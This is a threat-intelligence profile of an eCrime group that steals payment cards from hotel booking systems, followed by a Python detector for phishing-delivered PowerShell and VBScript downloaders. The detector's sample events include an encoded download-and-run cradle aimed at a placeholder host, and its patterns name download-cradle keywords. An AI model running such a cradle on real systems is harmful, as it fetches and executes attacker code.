Threat Actor Profile

Odyssey Spider

Odyssey Spider is a financially motivated eCrime adversary active since at least late 2018. The group targets the hospitality and travel sectors to steal payment card data captured during reservation and booking processes. It operates primarily from Brazil; its victims are concentrated in Latin America, with activity also observed in parts of Southwestern Europe, and its methods have grown more complex with each campaign.

Country of Origin

Odyssey Spider is believed to originate from Brazil. Multiple indicators, including its use of regionally relevant phishing lures and its primary focus on LATAM organizations, strongly suggest Brazil as its base of operations.

Members

The exact size of Odyssey Spider remains uncertain. The breadth of its campaigns and the growing sophistication of its custom malware suggest a mid-sized group with specialized skills in scripting, malware deployment, and infrastructure management.

Leadership

At this time, the identities or aliases of Odyssey Spider's leadership remain unknown. The group's coordinated and sustained activity implies a structured organization, but no leadership has been publicly identified.

Odyssey Spider TTPs

Odyssey Spider's tactics, techniques, and procedures (TTPs) reveal a calculated and targeted approach aimed at financial gain. Below is a breakdown of their known methods:

Tactics

Odyssey Spider primarily aims to steal payment card information during travel and hotel booking processes. Their tactics center around targeting organizations in the hospitality sector and leveraging phishing schemes tailored to those industries.

Techniques

The group gains initial access through phishing emails disguised as hotel booking confirmations. It then deploys custom malware, including Remote Access Trojans (RATs) and the screen-capture tool CapturaTela, to collect and exfiltrate sensitive data.

Procedures

Odyssey Spider's notable operational methods include:

  • Phishing campaigns crafted around hotel and travel-themed lures.

  • Deployment of custom PowerShell and VBScript downloaders delivered through those lures.

  • Use of a multi-stage loader named Alosh to evade detection.

  • Obfuscation of payloads with tools such as the Fsociety crypter.

  • Exploitation of compromised booking systems to harvest and exfiltrate payment card data.


Notable Cyberattacks

A significant attack attributed to Odyssey Spider involved the compromise of a prominent Latin American hotel chain's reservation system, resulting in the theft of thousands of customer credit card details. The group’s tactics leveraged customized phishing emails and advanced obfuscation to execute the breach.

Law Enforcement & Arrests

To date, no known arrests of Odyssey Spider members have been publicly reported. Given their geographical base in Brazil and operations spanning multiple regions, collaboration between international law enforcement agencies will be critical to disrupt their activities.

How to Defend Against Odyssey Spider

1. Email and Phishing Protections:

  • Train employees to identify and report phishing attempts with regular, engaging security awareness training; use hotel and travel booking lures in phishing simulations, since those are the themes this group relies on.

  • Detonate email attachments and scripts in a sandbox before delivery.

  • Restrict PowerShell and VBScript where users do not need them: enforce Constrained Language Mode and script block logging for PowerShell, and disable Windows Script Host (wscript.exe and cscript.exe) by policy on workstations with no business use for it.

2. Endpoint and Network Defenses:

  • Monitor for script hosts (powershell.exe, wscript.exe, cscript.exe) spawned by mail clients or Office applications, for encoded or download-cradle command lines, and for behaviors associated with custom loaders such as Alosh.

  • Use malware analysis tooling that can unpack crypters such as Fsociety and detect layered obfuscation.

3. Web Application Security:

  • Harden booking management systems against unauthorized file uploads and injected scripts.

  • Run regular audits and enforce PCI DSS requirements for payment data security.
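The script-host monitoring described above, and the PowerShell/VBScript downloader chain listed under Procedures, can be turned into concrete detection logic. The following Python is an added example written for this page; it is not Huntress code and not Odyssey Spider tooling. The field names (image, parent_image, command_line) and the four sample events are constructed assumptions modelled on Windows Security 4688 / Sysmon Event ID 1 process-creation data, and the URL in the sample is a placeholder.

```python
"""Flag process-creation events consistent with phishing-delivered
PowerShell/VBScript downloaders (script host spawned by a mail client,
encoded command, download cradle, hidden-window flags).

Added example: not Huntress code and not tied to any SIEM schema.
Field names are an assumption modelled on 4688 / Sysmon ID 1 data.
"""
import base64
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
MAIL_AND_OFFICE = {"outlook.exe", "thunderbird.exe", "winword.exe", "excel.exe"}

# Common download-cradle and in-memory-execution keywords.
DOWNLOAD_CRADLE = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|"
    r"start-bitstransfer|msxml2\.xmlhttp|invoke-expression|\biex\b)", re.I)
# -enc/-EncodedCommand followed by a base64 blob (UTF-16LE script inside).
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
# Flags that hide the console or skip the profile; //B and //E:vbscript are WSH flags.
QUIET_FLAGS = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile|//b\b|//e:vbscript", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def score_event(ev):
    """Return the list of reasons an event is suspicious (empty means benign)."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    parent = ev["parent_image"].rsplit("\\", 1)[-1].lower()
    if image not in SCRIPT_HOSTS:
        return []
    reasons = []
    if parent in MAIL_AND_OFFICE:
        reasons.append(f"{image} spawned by {parent}")
    cmd = ev["command_line"]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
        cmd = f"{cmd} {decoded}"  # inspect the decoded script as well
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download cradle / in-memory execution")
    if QUIET_FLAGS.search(cmd):
        reasons.append("hidden-window or non-interactive flags")
    return reasons


def scan(events):
    """Return (event id, reasons) for every event that scores at least one reason."""
    return [(ev["id"], r) for ev in events if (r := score_event(ev))]


# Constructed sample events (not real telemetry). The encoded command is
# built here so the base64 is correct; the URL is a placeholder.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/reserva.ps1')"
_ENC = base64.b64encode(_STAGE2.encode("utf-16-le")).decode()
EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "command_line": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"id": 2, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "command_line": r'wscript.exe //B //E:vbscript "C:\Users\ana\AppData\Local\Temp\Reserva_4471.vbs"'},
    {"id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe Get-ChildItem C:\\Reports"},  # benign admin use
    {"id": 4, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "cmd.exe /c dir"},  # not a script host
]

if __name__ == "__main__":
    for event_id, reasons in scan(EVENTS):
        print(f"event {event_id}: " + "; ".join(reasons))
```

Events 1 and 2 are flagged (Outlook spawning a script host, plus an encoded download cradle with hidden-window flags in the first case and WSH batch-mode flags in the second); the interactive PowerShell session and the cmd.exe launch score nothing. Decoding the -EncodedCommand blob before matching is what keeps the cradle check from being defeated by the encoding, and checking the parent process rather than the script host alone is what keeps ordinary administrative PowerShell use from alerting.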


Huntress's advanced endpoint detection and threat intelligence solutions can assist in identifying and neutralizing Odyssey Spider's activities before they escalate into major breaches.
